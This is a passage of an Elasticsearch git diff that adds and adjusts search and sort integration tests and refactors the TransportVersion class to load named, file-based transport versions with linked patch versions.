searchRequestBuilder.setTimeout(TimeValue.timeValueSeconds(1)).execute(); + assertThat(searchRequestFuture.isCancelled(), equalTo(false)); + assertThat(searchRequestFuture.isDone(), equalTo(false)); + + // Check that there are search tasks running + assertThat(getSearchTasks(), not(empty())); + + // Wait for the script field to get blocked + assertBusy(() -> assertThat(SCRIPT_SEMAPHORE.getQueueLength(), greaterThan(0))); + + // Cancel the tasks + // Warning: Adding a waitForCompletion(true)/execute() here sometimes causes tasks to not get canceled and threads to get stuck + client().admin().cluster().prepareCancelTasks().setActions(TransportSearchAction.NAME + "*").get(); + + SCRIPT_SEMAPHORE.release(SEMAPHORE_PERMITS); + + // Ensure the search request finished and that there are no more search tasks + assertBusy(() -> { + assertThat("Search request didn't finish", searchRequestFuture.isDone(), equalTo(true)); + assertThat("There are dangling search tasks", getSearchTasks(), empty()); + }); + } + + private List getSearchTasks() { + return client().admin() + .cluster() + .prepareListTasks() + .setActions(TransportSearchAction.NAME + "*") + .setDetailed(true) + .get() + .getTasks(); + } + + public static class PauseScriptPlugin extends Plugin implements ScriptPlugin { + public static final String PAUSE_SCRIPT_LANG = "pause"; + + @Override + public ScriptEngine getScriptEngine(Settings settings, Collection> contexts) { + return new ScriptEngine() { + @Override + public String getType() { + return PAUSE_SCRIPT_LANG; + } + + @Override + @SuppressWarnings("unchecked") + public FactoryType compile( + String name, + String code, + ScriptContext context, + Map params + ) { + if (context == LongFieldScript.CONTEXT) { + return (FactoryType) new LongFieldScript.Factory() { + @Override + public LongFieldScript.LeafFactory newFactory( + String fieldName, + Map params, + SearchLookup searchLookup, + OnScriptError onScriptError + ) { + return ctx -> new LongFieldScript(fieldName, params, searchLookup, onScriptError, ctx) { + @Override + public void execute() { + try { + SCRIPT_SEMAPHORE.acquire(); + } catch (InterruptedException e) { + throw new AssertionError(e); + } + emit(1); + } + }; + } + }; + } + throw new IllegalStateException("unsupported type " + context); + } + + @Override + public Set> getSupportedContexts() { + return Set.of(LongFieldScript.CONTEXT); + } + }; + } + } +} diff --git a/server/src/internalClusterTest/java/org/elasticsearch/search/functionscore/FunctionScorePluginIT.java b/server/src/internalClusterTest/java/org/elasticsearch/search/functionscore/FunctionScorePluginIT.java index 1bf72071b6bbf..a9f5a6bd4f414 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/search/functionscore/FunctionScorePluginIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/search/functionscore/FunctionScorePluginIT.java @@ -11,7 +11,6 @@ import org.apache.lucene.search.Explanation; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.index.IndexRequest; import org.elasticsearch.action.search.SearchRequest; import org.elasticsearch.action.search.SearchType; @@ -137,7 +136,7 @@ public DecayFunction getDecayFunction() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } private static final DecayFunction decayFunction = new LinearMultScoreFunction(); diff --git a/server/src/internalClusterTest/java/org/elasticsearch/search/msearch/MultiSearchIT.java b/server/src/internalClusterTest/java/org/elasticsearch/search/msearch/MultiSearchIT.java index 5e4ae084eaa4a..a0945190d1222 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/search/msearch/MultiSearchIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/search/msearch/MultiSearchIT.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.msearch; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.search.MultiSearchRequest; import org.elasticsearch.action.search.MultiSearchResponse.Item; import org.elasticsearch.common.settings.Settings; @@ -90,10 +89,10 @@ public void testSimpleMultiSearchMoreRequests() throws Exception { /** * Test that triggering the CCS compatibility check with a query that shouldn't go to the minor before - * TransportVersions.MINIMUM_CCS_VERSION works + * TransportVersion.minimumCCSVersion() works */ public void testCCSCheckCompatibility() throws Exception { - TransportVersion transportVersion = TransportVersionUtils.getNextVersion(TransportVersions.MINIMUM_CCS_VERSION, true); + TransportVersion transportVersion = TransportVersionUtils.getNextVersion(TransportVersion.minimumCCSVersion(), true); createIndex("test"); ensureGreen(); prepareIndex("test").setId("1").setSource("field", "xxx").get(); diff --git a/server/src/internalClusterTest/java/org/elasticsearch/search/sort/FieldSortIT.java b/server/src/internalClusterTest/java/org/elasticsearch/search/sort/FieldSortIT.java index 2cd610f204d9e..97da362eebe82 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/search/sort/FieldSortIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/search/sort/FieldSortIT.java @@ -9,6 +9,7 @@ package org.elasticsearch.search.sort; +import org.apache.http.util.EntityUtils; import org.apache.lucene.tests.util.TestUtil; import org.apache.lucene.util.BytesRef; import org.apache.lucene.util.UnicodeUtil; @@ -20,6 +21,9 @@ import org.elasticsearch.action.search.SearchRequestBuilder; import org.elasticsearch.action.search.SearchResponse; import org.elasticsearch.action.search.ShardSearchFailure; +import org.elasticsearch.client.Request; +import org.elasticsearch.client.Response; +import org.elasticsearch.client.RestClient; import org.elasticsearch.cluster.metadata.IndexMetadata; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.core.Strings; @@ -36,6 +40,7 @@ import org.elasticsearch.search.SearchHits; import org.elasticsearch.test.ESIntegTestCase; import org.elasticsearch.test.InternalSettingsPlugin; +import org.elasticsearch.test.junit.annotations.TestIssueLogging; import org.elasticsearch.xcontent.XContentBuilder; import org.elasticsearch.xcontent.XContentFactory; import org.elasticsearch.xcontent.XContentType; @@ -84,6 +89,12 @@ import static org.hamcrest.Matchers.not; import static org.hamcrest.Matchers.nullValue; +@TestIssueLogging( + issueUrl = "https://github.com/elastic/elasticsearch/issues/129445", + value = "org.elasticsearch.action.search.SearchQueryThenFetchAsyncAction:DEBUG," + + "org.elasticsearch.action.search.SearchPhaseController:DEBUG," + + "org.elasticsearch.search:TRACE" +) public class FieldSortIT extends ESIntegTestCase { public static class CustomScriptPlugin extends MockScriptPlugin { @Override @@ -112,6 +123,10 @@ protected Collection> nodePlugins() { return Arrays.asList(InternalSettingsPlugin.class, CustomScriptPlugin.class); } + protected boolean addMockHttpTransport() { + return false; + } + public void testIssue8226() { int numIndices = between(5, 10); final boolean useMapping = randomBoolean(); @@ -2145,7 +2160,7 @@ public void testLongSortOptimizationCorrectResults() { ); } - public void testSortMixedFieldTypes() { + public void testSortMixedFieldTypes() throws IOException { assertAcked( prepareCreate("index_long").setMapping("foo", "type=long"), prepareCreate("index_integer").setMapping("foo", "type=integer"), @@ -2159,6 +2174,16 @@ public void testSortMixedFieldTypes() { prepareIndex("index_keyword").setId("1").setSource("foo", "123").get(); refresh(); + // for debugging, we try to see where the documents are located + try (RestClient restClient = createRestClient()) { + Request checkShardsRequest = new Request( + "GET", + "/_cat/shards/index_long,index_double,index_keyword?format=json&h=index,node,shard,prirep,state,docs,index" + ); + Response response = restClient.performRequest(checkShardsRequest); + logger.info("FieldSortIT#testSortMixedFieldTypes document distribution: " + EntityUtils.toString(response.getEntity())); + } + { // mixing long and integer types is ok, as we convert integer sort to long sort assertNoFailures(prepareSearch("index_long", "index_integer").addSort(new FieldSortBuilder("foo")).setSize(10)); } diff --git a/server/src/internalClusterTest/java/org/elasticsearch/search/sort/RangeFieldSortIT.java b/server/src/internalClusterTest/java/org/elasticsearch/search/sort/RangeFieldSortIT.java new file mode 100644 index 0000000000000..8f3dea78b73e9 --- /dev/null +++ b/server/src/internalClusterTest/java/org/elasticsearch/search/sort/RangeFieldSortIT.java @@ -0,0 +1,107 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.search.sort; + +import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.index.mapper.RangeType; +import org.elasticsearch.rest.RestStatus; +import org.elasticsearch.test.ESSingleNodeTestCase; +import org.elasticsearch.xcontent.XContentBuilder; +import org.elasticsearch.xcontent.XContentFactory; + +import static org.elasticsearch.index.query.QueryBuilders.matchAllQuery; +import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertFailures; +import static org.hamcrest.Matchers.containsString; + +public class RangeFieldSortIT extends ESSingleNodeTestCase { + + private static final String FIELD_NAME = "range"; + + public void testSortingOnIntegerRangeFieldThrows400() throws Exception { + String indexName = "int_range_index"; + createIndex(indexName, FIELD_NAME, RangeType.INTEGER.typeName()); + assertFailures( + client().prepareSearch(indexName).setQuery(matchAllQuery()).addSort(SortBuilders.fieldSort(FIELD_NAME).order(SortOrder.ASC)), + RestStatus.BAD_REQUEST, + containsString("Sorting by range field [" + FIELD_NAME + "] is not supported") + ); + } + + public void testSortingOnLongRangeFieldThrows400() throws Exception { + String indexName = "long_range_index"; + createIndex(indexName, FIELD_NAME, RangeType.LONG.typeName()); + assertFailures( + client().prepareSearch(indexName).setQuery(matchAllQuery()).addSort(SortBuilders.fieldSort(FIELD_NAME).order(SortOrder.ASC)), + RestStatus.BAD_REQUEST, + containsString("Sorting by range field [" + FIELD_NAME + "] is not supported") + ); + } + + public void testSortingOnFloatRangeFieldThrows400() throws Exception { + String indexName = "float_range_index"; + createIndex(indexName, FIELD_NAME, RangeType.FLOAT.typeName()); + assertFailures( + client().prepareSearch(indexName).setQuery(matchAllQuery()).addSort(SortBuilders.fieldSort(FIELD_NAME).order(SortOrder.ASC)), + RestStatus.BAD_REQUEST, + containsString("Sorting by range field [" + FIELD_NAME + "] is not supported") + ); + } + + public void testSortingOnDoubleRangeFieldThrows400() throws Exception { + String indexName = "double_range_index"; + createIndex(indexName, FIELD_NAME, RangeType.DOUBLE.typeName()); + assertFailures( + client().prepareSearch(indexName).setQuery(matchAllQuery()).addSort(SortBuilders.fieldSort(FIELD_NAME).order(SortOrder.ASC)), + RestStatus.BAD_REQUEST, + containsString("Sorting by range field [" + FIELD_NAME + "] is not supported") + ); + } + + public void testSortingOnIpRangeFieldThrows400() throws Exception { + String indexName = "ip_range_index"; + createIndex(indexName, FIELD_NAME, RangeType.IP.typeName()); + assertFailures( + client().prepareSearch(indexName).setQuery(matchAllQuery()).addSort(SortBuilders.fieldSort(FIELD_NAME).order(SortOrder.ASC)), + RestStatus.BAD_REQUEST, + containsString("Sorting by range field [" + FIELD_NAME + "] is not supported") + ); + } + + public void testSortingOnDateRangeFieldThrows400() throws Exception { + String indexName = "date_range_index"; + createIndex(indexName, FIELD_NAME, RangeType.DATE.typeName()); + assertFailures( + client().prepareSearch(indexName).setQuery(matchAllQuery()).addSort(SortBuilders.fieldSort(FIELD_NAME).order(SortOrder.ASC)), + RestStatus.BAD_REQUEST, + containsString("Sorting by range field [" + FIELD_NAME + "] is not supported") + ); + } + + private void createIndex(String indexName, String rangeFieldName, String rangeFieldType) throws Exception { + int numShards = randomIntBetween(1, 3); + client().admin() + .indices() + .prepareCreate(indexName) + .setSettings(Settings.builder().put("index.number_of_shards", numShards)) + .setMapping(createMapping(rangeFieldName, rangeFieldType)) + .get(); + } + + private XContentBuilder createMapping(String fieldName, String fieldType) throws Exception { + return XContentFactory.jsonBuilder() + .startObject() + .startObject("properties") + .startObject(fieldName) + .field("type", fieldType) + .endObject() + .endObject() + .endObject(); + } +} diff --git a/server/src/internalClusterTest/java/org/elasticsearch/snapshots/DedicatedClusterSnapshotRestoreIT.java b/server/src/internalClusterTest/java/org/elasticsearch/snapshots/DedicatedClusterSnapshotRestoreIT.java index e0bfab595a318..fa2b47fda03a9 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/snapshots/DedicatedClusterSnapshotRestoreIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/snapshots/DedicatedClusterSnapshotRestoreIT.java @@ -1077,7 +1077,6 @@ public void onRequestSent( final ActionFuture deleteResponse = startDeleteSnapshot(repoName, snapshotName); awaitClusterState( - logger, otherDataNode, state -> SnapshotsInProgress.get(state) .forRepo(repoName) diff --git a/server/src/internalClusterTest/java/org/elasticsearch/snapshots/MultiClusterRepoAccessIT.java b/server/src/internalClusterTest/java/org/elasticsearch/snapshots/MultiClusterRepoAccessIT.java index c1549c1f3d384..875052ce3998c 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/snapshots/MultiClusterRepoAccessIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/snapshots/MultiClusterRepoAccessIT.java @@ -77,7 +77,8 @@ public Path nodeConfigPath(int nodeOrdinal) { InternalSettingsPlugin.class, getTestTransportPlugin() ), - Function.identity() + Function.identity(), + TEST_ENTITLEMENTS::addEntitledNodePaths ); secondCluster.beforeTest(random()); } diff --git a/server/src/main/java/module-info.java b/server/src/main/java/module-info.java index e6a44a0fba7a4..66811ab3ce44b 100644 --- a/server/src/main/java/module-info.java +++ b/server/src/main/java/module-info.java @@ -429,6 +429,7 @@ org.elasticsearch.index.mapper.MapperFeatures, org.elasticsearch.index.IndexFeatures, org.elasticsearch.search.SearchFeatures, + org.elasticsearch.synonyms.SynonymFeatures, org.elasticsearch.script.ScriptFeatures, org.elasticsearch.search.retriever.RetrieversFeatures, org.elasticsearch.action.admin.cluster.stats.ClusterStatsFeatures; diff --git a/server/src/main/java/org/elasticsearch/ElasticsearchException.java b/server/src/main/java/org/elasticsearch/ElasticsearchException.java index 7b229c1f979ae..5948607cbd0b7 100644 --- a/server/src/main/java/org/elasticsearch/ElasticsearchException.java +++ b/server/src/main/java/org/elasticsearch/ElasticsearchException.java @@ -85,7 +85,7 @@ */ public class ElasticsearchException extends RuntimeException implements ToXContentFragment, Writeable { - private static final TransportVersion UNKNOWN_VERSION_ADDED = TransportVersions.ZERO; + private static final TransportVersion UNKNOWN_VERSION_ADDED = TransportVersion.zero(); /** * Passed in the {@link Params} of {@link #generateThrowableXContent(XContentBuilder, Params, Throwable)} diff --git a/server/src/main/java/org/elasticsearch/TransportVersion.java b/server/src/main/java/org/elasticsearch/TransportVersion.java index f1e20ac4bb77e..bdef45eff2696 100644 --- a/server/src/main/java/org/elasticsearch/TransportVersion.java +++ b/server/src/main/java/org/elasticsearch/TransportVersion.java @@ -15,19 +15,34 @@ import org.elasticsearch.internal.VersionExtension; import org.elasticsearch.plugins.ExtensionLoader; +import java.io.BufferedReader; import java.io.IOException; +import java.io.InputStream; +import java.io.InputStreamReader; +import java.io.UncheckedIOException; +import java.nio.charset.StandardCharsets; +import java.util.ArrayList; import java.util.Collection; import java.util.Collections; import java.util.List; import java.util.Map; +import java.util.Objects; import java.util.ServiceLoader; import java.util.function.Function; +import java.util.function.IntFunction; import java.util.stream.Collectors; -import java.util.stream.Stream; /** * Represents the version of the wire protocol used to communicate between a pair of ES nodes. *

+ * Note: We are currently transitioning to a file-based system to load and maintain transport versions. These file-based transport + * versions are named and are referred to as named transport versions. Named transport versions also maintain a linked list of their + * own patch versions to simplify transport version compatibility checks. Transport versions that continue to be loaded through + * {@link TransportVersions} are referred to as unnamed transport versions. Unnamed transport versions will continue being used + * over the wire as we only need the id for compatibility checks even against named transport versions. There are changes + * throughout {@link TransportVersion} that are for this transition. For now, continue to use the existing system of adding unnamed + * transport versions to {@link TransportVersions}. + *

* Prior to 8.8.0, the release {@link Version} was used everywhere. This class separates the wire protocol version from the release version. *

* Each transport version constant has an id number, which for versions prior to 8.9.0 is the same as the release version for backwards @@ -41,12 +56,12 @@ * those two merged commits. * *

Version compatibility

- * The earliest compatible version is hardcoded in the {@link TransportVersions#MINIMUM_COMPATIBLE} field. Previously, this was dynamically + * The earliest compatible version is hardcoded in the {@link VersionsHolder#MINIMUM_COMPATIBLE} field. Previously, this was dynamically * calculated from the major/minor versions of {@link Version}, but {@code TransportVersion} does not have separate major/minor version * numbers. So the minimum compatible version is hard-coded as the transport version used by the highest minor release of the previous - * major version. {@link TransportVersions#MINIMUM_COMPATIBLE} should be updated appropriately whenever a major release happens. + * major version. {@link VersionsHolder#MINIMUM_COMPATIBLE} should be updated appropriately whenever a major release happens. *

- * The earliest CCS compatible version is hardcoded at {@link TransportVersions#MINIMUM_CCS_VERSION}, as the transport version used by the + * The earliest CCS compatible version is hardcoded at {@link VersionsHolder#MINIMUM_CCS_VERSION}, as the transport version used by the * previous minor release. This should be updated appropriately whenever a minor release happens. * *

Scope of usefulness of {@link TransportVersion}

@@ -57,7 +72,138 @@ * different version value. If you need to know whether the cluster as a whole speaks a new enough {@link TransportVersion} to understand a * newly-added feature, use {@link org.elasticsearch.cluster.ClusterState#getMinTransportVersion}. */ -public record TransportVersion(int id) implements VersionId { +public record TransportVersion(String name, int id, TransportVersion nextPatchVersion) implements VersionId { + + /** + * Constructs an unnamed transport version. + */ + public TransportVersion(int id) { + this(null, id, null); + } + + interface BufferedReaderParser { + T parse(String component, String path, BufferedReader bufferedReader); + } + + static T parseFromBufferedReader( + String component, + String path, + Function nameToStream, + BufferedReaderParser parser + ) { + try (InputStream inputStream = nameToStream.apply(path)) { + if (inputStream == null) { + return null; + } + try (BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream, StandardCharsets.UTF_8))) { + return parser.parse(component, path, bufferedReader); + } + } catch (IOException ioe) { + throw new UncheckedIOException("parsing error [" + component + ":" + path + "]", ioe); + } + } + + /** + * Constructs a named transport version along with its set of compatible patch versions from x-content. + * This method takes in the parameter {@code upperBound} which is the highest transport version id + * that will be loaded by this node. + */ + public static TransportVersion fromBufferedReader( + String component, + String path, + boolean nameInFile, + boolean isNamed, + BufferedReader bufferedReader, + Integer upperBound + ) { + try { + String line = bufferedReader.readLine(); + String[] parts = line.replaceAll("\\s+", "").split(","); + String check; + while ((check = bufferedReader.readLine()) != null) { + if (check.replaceAll("\\s+", "").isEmpty() == false) { + throw new IllegalArgumentException("invalid transport version file format [" + toComponentPath(component, path) + "]"); + } + } + if (parts.length < (nameInFile ? 2 : 1)) { + throw new IllegalStateException("invalid transport version file format [" + toComponentPath(component, path) + "]"); + } + String name = null; + if (isNamed) { + if (nameInFile) { + name = parts[0]; + } else { + name = path.substring(path.lastIndexOf('/') + 1, path.length() - 4); + } + } + List ids = new ArrayList<>(); + for (int i = nameInFile ? 1 : 0; i < parts.length; ++i) { + try { + ids.add(Integer.parseInt(parts[i])); + } catch (NumberFormatException nfe) { + throw new IllegalStateException( + "invalid transport version file format [" + toComponentPath(component, path) + "]", + nfe + ); + } + } + TransportVersion transportVersion = null; + for (int idIndex = ids.size() - 1; idIndex >= 0; --idIndex) { + if (idIndex > 0 && ids.get(idIndex - 1) <= ids.get(idIndex)) { + throw new IllegalStateException("invalid transport version file format [" + toComponentPath(component, path) + "]"); + } + if (ids.get(idIndex) > upperBound) { + break; + } + transportVersion = new TransportVersion(name, ids.get(idIndex), transportVersion); + } + return transportVersion; + } catch (IOException ioe) { + throw new UncheckedIOException("invalid transport version file format [" + toComponentPath(component, path) + "]", ioe); + } + } + + public static List collectFromInputStreams( + String component, + String resourceRoot, + Function resourceLoader, + String upperBoundFileName + ) { + TransportVersion upperBound = parseFromBufferedReader( + component, + resourceRoot + "/upper_bounds/" + upperBoundFileName, + resourceLoader, + (c, p, br) -> fromBufferedReader(c, p, true, false, br, Integer.MAX_VALUE) + ); + if (upperBound != null) { + List versionRelativePaths = parseFromBufferedReader( + component, + resourceRoot + "/definitions/manifest.txt", + resourceLoader, + (c, p, br) -> br.lines().filter(line -> line.isBlank() == false).toList() + ); + if (versionRelativePaths != null) { + List transportVersions = new ArrayList<>(); + for (String versionRelativePath : versionRelativePaths) { + TransportVersion transportVersion = parseFromBufferedReader( + component, + resourceRoot + "/definitions/" + versionRelativePath, + resourceLoader, + (c, p, br) -> fromBufferedReader(c, p, false, versionRelativePath.startsWith("referable/"), br, upperBound.id()) + ); + if (transportVersion != null) { + transportVersions.add(transportVersion); + } + } + return transportVersions; + } + } + return List.of(); + } + + private static String toComponentPath(String component, String path) { + return component + ":" + path; + } public static TransportVersion readVersion(StreamInput in) throws IOException { return fromId(in.readVInt()); @@ -70,7 +216,7 @@ public static TransportVersion readVersion(StreamInput in) throws IOException { * The new instance is not registered in {@code TransportVersion.getAllVersions}. */ public static TransportVersion fromId(int id) { - TransportVersion known = VersionsHolder.ALL_VERSIONS_MAP.get(id); + TransportVersion known = VersionsHolder.ALL_VERSIONS_BY_ID.get(id); if (known != null) { return known; } @@ -78,6 +224,23 @@ public static TransportVersion fromId(int id) { return new TransportVersion(id); } + /** + * Finds a {@link TransportVersion} by its name. The parameter {@code name} must be a {@link String} + * direct value or validation checks will fail. {@code TransportVersion.fromName("direct_value")}. + *

+ * This will only return the latest known referable transport version for a given name and not its + * patch versions. Patch versions are constructed as a linked list internally and may be found by + * cycling through them in a loop using {@link TransportVersion#nextPatchVersion()}. + * + */ + public static TransportVersion fromName(String name) { + TransportVersion known = VersionsHolder.ALL_VERSIONS_BY_NAME.get(name); + if (known == null) { + throw new IllegalStateException("unknown transport version [" + name + "]"); + } + return known; + } + public static void writeVersion(TransportVersion version, StreamOutput out) throws IOException { out.writeVInt(version.id); } @@ -100,7 +263,7 @@ public static TransportVersion max(TransportVersion version1, TransportVersion v * Returns {@code true} if the specified version is compatible with this running version of Elasticsearch. */ public static boolean isCompatible(TransportVersion version) { - return version.onOrAfter(TransportVersions.MINIMUM_COMPATIBLE); + return version.onOrAfter(VersionsHolder.MINIMUM_COMPATIBLE); } /** @@ -111,6 +274,29 @@ public static TransportVersion current() { return VersionsHolder.CURRENT; } + /** + * Sentinel value for lowest possible transport version + */ + public static TransportVersion zero() { + return VersionsHolder.ZERO; + } + + /** + * Reference to the earliest compatible transport version to this version of the codebase. + * This should be the transport version used by the highest minor version of the previous major. + */ + public static TransportVersion minimumCompatible() { + return VersionsHolder.MINIMUM_COMPATIBLE; + } + + /** + * Reference to the minimum transport version that can be used with CCS. + * This should be the transport version used by the previous minor release. + */ + public static TransportVersion minimumCCSVersion() { + return VersionsHolder.MINIMUM_CCS_VERSION; + } + /** * Sorted list of all defined transport versions */ @@ -123,19 +309,19 @@ public static List getAllVersions() { * in the wild (they're sent over the wire by numeric ID) but we don't know how to communicate using such versions. */ public boolean isKnown() { - return VersionsHolder.ALL_VERSIONS_MAP.containsKey(id); + return VersionsHolder.ALL_VERSIONS_BY_ID.containsKey(id); } /** - * @return the newest known {@link TransportVersion} which is no older than this instance. Returns {@link TransportVersions#ZERO} if + * @return the newest known {@link TransportVersion} which is no older than this instance. Returns {@link VersionsHolder#ZERO} if * there are no such versions. */ public TransportVersion bestKnownVersion() { if (isKnown()) { return this; } - TransportVersion bestSoFar = TransportVersions.ZERO; - for (final var knownVersion : VersionsHolder.ALL_VERSIONS_MAP.values()) { + TransportVersion bestSoFar = VersionsHolder.ZERO; + for (final var knownVersion : VersionsHolder.ALL_VERSIONS_BY_ID.values()) { if (knownVersion.after(bestSoFar) && knownVersion.before(this)) { bestSoFar = knownVersion; } @@ -171,12 +357,75 @@ public boolean isPatchFrom(TransportVersion version) { return onOrAfter(version) && id < version.id + 100 - (version.id % 100); } + /** + * Supports is used to determine if a named transport version is supported + * by a caller transport version. This will check both the latest id + * and all of its patch ids for compatibility. This replaces the pattern + * of {@code wireTV.onOrAfter(TV_FEATURE) || wireTV.isPatchFrom(TV_FEATURE_BACKPORT) || ...} + * for unnamed transport versions with {@code wireTV.supports(TV_FEATURE)} for named + * transport versions (since referable versions know about their own patch versions). + *

+ * The recommended use of this method is to declare a static final {@link TransportVersion} + * as part of the file that it's used in. This constant is then used in conjunction with + * this method to check transport version compatability. + *

+ * An example: + * {@code + * public class ExampleClass { + * ... + * TransportVersion TV_FEATURE = TransportVersion.fromName("tv_feature"); + * ... + * public static ExampleClass readFrom(InputStream in) { + * ... + * if (in.getTransportVersion().supports(TV_FEATURE) { + * // read newer values + * } + * ... + * } + * ... + * public void writeTo(OutputStream out) { + * ... + * if (out.getTransportVersion().supports(TV_FEATURE) { + * // write newer values + * } + * ... + * } + * ... + * } + * } + */ + public boolean supports(TransportVersion version) { + if (onOrAfter(version)) { + return true; + } + TransportVersion nextPatchVersion = version.nextPatchVersion; + while (nextPatchVersion != null) { + if (isPatchFrom(nextPatchVersion)) { + return true; + } + nextPatchVersion = nextPatchVersion.nextPatchVersion; + } + return false; + } + /** * Returns a string representing the Elasticsearch release version of this transport version, * if applicable for this deployment, otherwise the raw version number. */ public String toReleaseVersion() { - return TransportVersions.VERSION_LOOKUP.apply(id); + return VersionsHolder.VERSION_LOOKUP_BY_RELEASE.apply(id); + } + + @Override + public boolean equals(Object o) { + if (o == null || getClass() != o.getClass()) return false; + TransportVersion that = (TransportVersion) o; + return id == that.id; + } + + @Override + public int hashCode() { + return Objects.hashCode(id); } @Override @@ -184,25 +433,86 @@ public String toString() { return Integer.toString(id); } + /** + * This class holds various data structures for loading transport versions, both + * named file-based definitions and unnamed. While we transition to file-based transport versions, this class will + * load and merge unnamed transport versions from {@link TransportVersions} along with + * transport version definitions specified in a manifest file in resources. + */ private static class VersionsHolder { + private static final List ALL_VERSIONS; - private static final Map ALL_VERSIONS_MAP; + private static final Map ALL_VERSIONS_BY_ID; + private static final Map ALL_VERSIONS_BY_NAME; + private static final IntFunction VERSION_LOOKUP_BY_RELEASE; + private static final TransportVersion CURRENT; + private static final TransportVersion ZERO; + private static final TransportVersion MINIMUM_COMPATIBLE; + private static final TransportVersion MINIMUM_CCS_VERSION; static { + // collect all the transport versions from server and es modules/plugins (defined in server) + List allVersions = new ArrayList<>(TransportVersions.DEFINED_VERSIONS); + List streamVersions = collectFromInputStreams( + "", + "/transport", + TransportVersion.class::getResourceAsStream, + Version.CURRENT.major + "." + Version.CURRENT.minor + ".csv" + ); + Map allVersionsByName = streamVersions.stream() + .filter(tv -> tv.name() != null) + .collect(Collectors.toMap(TransportVersion::name, v -> v)); + addTransportVersions(streamVersions, allVersions).sort(TransportVersion::compareTo); + + // set version lookup by release before adding serverless versions + // serverless versions should not affect release version + VERSION_LOOKUP_BY_RELEASE = ReleaseVersions.generateVersionsLookup( + TransportVersions.class, + allVersions.get(allVersions.size() - 1).id() + ); + + // collect all the transport versions from serverless Collection extendedVersions = ExtensionLoader.loadSingleton(ServiceLoader.load(VersionExtension.class)) .map(VersionExtension::getTransportVersions) .orElse(Collections.emptyList()); - - if (extendedVersions.isEmpty()) { - ALL_VERSIONS = TransportVersions.DEFINED_VERSIONS; - } else { - ALL_VERSIONS = Stream.concat(TransportVersions.DEFINED_VERSIONS.stream(), extendedVersions.stream()).sorted().toList(); + addTransportVersions(extendedVersions, allVersions).sort(TransportVersion::compareTo); + for (TransportVersion version : extendedVersions) { + if (version.name() != null) { + allVersionsByName.put(version.name(), version); + } } - ALL_VERSIONS_MAP = ALL_VERSIONS.stream().collect(Collectors.toUnmodifiableMap(TransportVersion::id, Function.identity())); + // set the transport version lookups + ALL_VERSIONS = Collections.unmodifiableList(allVersions); + ALL_VERSIONS_BY_ID = ALL_VERSIONS.stream().collect(Collectors.toUnmodifiableMap(TransportVersion::id, Function.identity())); + ALL_VERSIONS_BY_NAME = Collections.unmodifiableMap(allVersionsByName); CURRENT = ALL_VERSIONS.getLast(); + ZERO = new TransportVersion(0); + MINIMUM_COMPATIBLE = loadConstant("minimum_compatible"); + MINIMUM_CCS_VERSION = loadConstant("minimum_ccs_version"); + } + + private static TransportVersion loadConstant(String name) { + return parseFromBufferedReader( + "", + "/transport/constants/" + name + ".csv", + TransportVersion.class::getResourceAsStream, + (c, p, br) -> fromBufferedReader(c, p, false, false, br, Integer.MAX_VALUE) + ); + } + + private static List addTransportVersions(Collection addFrom, List addTo) { + for (TransportVersion transportVersion : addFrom) { + addTo.add(transportVersion); + TransportVersion patchVersion = transportVersion.nextPatchVersion(); + while (patchVersion != null) { + addTo.add(patchVersion); + patchVersion = patchVersion.nextPatchVersion(); + } + } + return addTo; } } } diff --git a/server/src/main/java/org/elasticsearch/TransportVersions.java b/server/src/main/java/org/elasticsearch/TransportVersions.java index 07bf5e3d50267..351b6dbce1f4a 100644 --- a/server/src/main/java/org/elasticsearch/TransportVersions.java +++ b/server/src/main/java/org/elasticsearch/TransportVersions.java @@ -17,9 +17,7 @@ import java.util.HashMap; import java.util.List; import java.util.Map; -import java.util.Set; import java.util.TreeSet; -import java.util.function.IntFunction; /** *

Transport version is used to coordinate compatible wire protocol communication between nodes, at a fine-grained level. This replaces @@ -49,7 +47,6 @@ static TransportVersion def(int id) { } // TODO: ES-10337 we can remove all transport versions earlier than 8.18 - public static final TransportVersion ZERO = def(0); public static final TransportVersion V_7_0_0 = def(7_00_00_99); public static final TransportVersion V_7_1_0 = def(7_01_00_99); public static final TransportVersion V_7_2_0 = def(7_02_00_99); @@ -99,6 +96,8 @@ static TransportVersion def(int id) { public static final TransportVersion INITIAL_ELASTICSEARCH_8_17_7 = def(8_797_0_07); public static final TransportVersion INITIAL_ELASTICSEARCH_8_17_8 = def(8_797_0_08); public static final TransportVersion INITIAL_ELASTICSEARCH_8_17_9 = def(8_797_0_09); + public static final TransportVersion INITIAL_ELASTICSEARCH_8_17_10 = def(8_797_0_10); + public static final TransportVersion INITIAL_ELASTICSEARCH_8_17_11 = def(8_797_0_11); public static final TransportVersion INDEXING_PRESSURE_THROTTLING_STATS = def(8_798_0_00); public static final TransportVersion REINDEX_DATA_STREAMS = def(8_799_0_00); public static final TransportVersion ESQL_REMOVE_NODE_LEVEL_PLAN = def(8_800_0_00); @@ -148,6 +147,7 @@ static TransportVersion def(int id) { public static final TransportVersion INITIAL_ELASTICSEARCH_8_18_2 = def(8_840_0_04); public static final TransportVersion INITIAL_ELASTICSEARCH_8_18_3 = def(8_840_0_05); public static final TransportVersion 